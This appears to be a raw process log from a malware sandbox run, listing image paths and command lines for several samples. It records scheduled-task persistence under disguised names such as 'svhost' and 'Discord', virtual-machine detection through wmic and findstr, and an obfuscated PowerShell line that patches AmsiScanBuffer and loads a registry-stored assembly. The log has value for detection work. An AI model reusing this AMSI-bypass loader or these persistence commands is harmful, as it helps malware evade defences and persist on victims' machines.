"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\built.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\T4gy0CnbOZcl.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2wVHvYK17sCW.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\Sentil.exe

"C:\Users\Admin\Desktop\Files\Sentil.exe"

C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe

"C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe"

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f

C:\Users\Admin\Desktop\Files\Security.exe

"C:\Users\Admin\Desktop\Files\Security.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f

C:\Users\Admin\Desktop\Files\Client-built.exe

"C:\Users\Admin\Desktop\Files\Client-built.exe"

C:\Users\Admin\AppData\Local\Temp\$77Security.exe

"C:\Users\Admin\AppData\Local\Temp\$77Security.exe"

C:\Users\Admin\AppData\Local\Temp\Install.exe

"C:\Users\Admin\AppData\Local\Temp\Install.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:eYxrkBgfPWtB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mqPvfiVZWPJRjr,[Parameter(Position=1)][Type]$mpQFhykSbP)$jIppYFpwEhi=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Refl'+'e'+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+'D'+'e'+'leg'+'a'+'te'+'T'+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+'n'+'s'+''+[Char](105)+'C'+'l'+'a'+'s'+''+'s'+',A'+[Char](117)+''+[Char](116)+'oC'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$jIppYFpwEhi.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+'g'+','+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$mqPvfiVZWPJRjr).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$jIppYFpwEhi.DefineMethod(''+'I'+'nv'+'o'+'k'+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+'H'+'i'+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+'i'+'g'+[Char](44)+''+'N'+'e'+[Char](119)+''+[Char](83)+'lo'+'t'+''+','+'V'+[Char](105)+'rt'+'u'+'a'+[Char](108)+'',$mpQFhykSbP,$mqPvfiVZWPJRjr).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'ime'+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $jIppYFpwEhi.CreateType();}$AwvzxgReJitYU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+'ste'+'m'+''+'.'+''+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+''+'W'+'i'+[Char](110)+''+'3'+'2'+'.'+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+'fe'+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+[Char](118)+'e'+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$QYVgjFKiADBKpP=$AwvzxgReJitYU.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+'r'+'oc'+'A'+''+'d'+''+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'St'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XuRSdepCyIHsseQFTlK=eYxrkBgfPWtB @([String])([IntPtr]);$frMFLkiRfMTXoGuBloAVuT=eYxrkBgfPWtB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XLkjeedKkrZ=$AwvzxgReJitYU.GetMethod(''+[Char](71)+'etMo'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'H'+'a'+'n'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+'.'+[Char](100)+'ll')));$ZMoanjlXjbTSRq=$QYVgjFKiADBKpP.Invoke($Null,@([Object]$XLkjeedKkrZ,[Object]('L'+[Char](111)+'a'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$JJEwvHNtPEjoRYuON=$QYVgjFKiADBKpP.Invoke($Null,@([Object]$XLkjeedKkrZ,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$EwGuUkl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZMoanjlXjbTSRq,$XuRSdepCyIHsseQFTlK).Invoke('a'+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$XvjloYXHHsDbZEtcY=$QYVgjFKiADBKpP.Invoke($Null,@([Object]$EwGuUkl,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+'S'+''+'c'+'anB'+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$ssvSumgWpx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JJEwvHNtPEjoRYuON,$frMFLkiRfMTXoGuBloAVuT).Invoke($XvjloYXHHsDbZEtcY,[uint32]8,4,[ref]$ssvSumgWpx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XvjloYXHHsDbZEtcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JJEwvHNtPEjoRYuON,$frMFLkiRfMTXoGuBloAVuT).Invoke($XvjloYXHHsDbZEtcY,[uint32]8,0x20,[ref]$ssvSumgWpx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+[Char](84)+''+'W'+''+'A'+''+'R'+''+'E'+'').GetValue('$'+'7'+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KeBeUxMxt5rs.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{2f5dd3e4-d53d-410e-b3fd-fc4b177ea6d0}

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Security" /tr "C:\Users\Admin\AppData\Roaming\$77Security.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fg8OiSm2W9aH.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\srtware.exe

"C:\Users\Admin\Desktop\Files\srtware.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2060 -ip 2060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 84

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0gCc6gLqbZ4p.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OSFpz9bh9GZK.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgDm2GH1LKVy.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgDm2GH1LKVy.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 596 -p 2408 -ip 2408

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2408 -s 312

C:\Users\Admin\Desktop\Files\Pichon.exe

"C:\Users\Admin\Desktop\Files\Pichon.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LkORHBv6MEkT.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Users\Admin\Desktop\Files\TCP.exe

"C:\Users\Admin\Desktop\Files\TCP.exe"

C:\Users\Admin\Desktop\Files\c3.exe

"C:\Users\Admin\Desktop\Files\c3.exe"

C:\Users\Admin\Desktop\Files\winlog32.exe

"C:\Users\Admin\Desktop\Files\winlog32.exe"

C:\Users\Admin\Desktop\Files\TPB-1.exe

"C:\Users\Admin\Desktop\Files\TPB-1.exe"

C:\Users\Admin\Desktop\Files\TPB-1.exe

"C:\Users\Admin\Desktop\Files\TPB-1.exe"

C:\Users\Admin\Desktop\Files\TPB-1.exe

"C:\Users\Admin\Desktop\Files\TPB-1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5332 -ip 5332

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 860

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rYhDRPD5vi3w.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 552 -p 3144 -ip 3144

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3144 -s 344

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Loli169.bat

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 632 -p 5260 -ip 5260

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5260 -s 352

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hY3WriDIaW8q.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QqQGkUhifzGh.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OGro20IwsaQZ.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Users\Admin\Desktop\Files\MajesticExec.exe

"C:\Users\Admin\Desktop\Files\MajesticExec.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\q52y8mMUPLgh.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\qNVQKFyM.exe

"C:\Users\Admin\Desktop\Files\qNVQKFyM.exe"

C:\Users\Admin\Desktop\Files\svc.exe

"C:\Users\Admin\Desktop\Files\svc.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\d4V2EwdrqlEs.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eDlbxk1R5dLM.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fnaDQMRBOCPz.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9YDL858ngq4B.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\cmd.exe

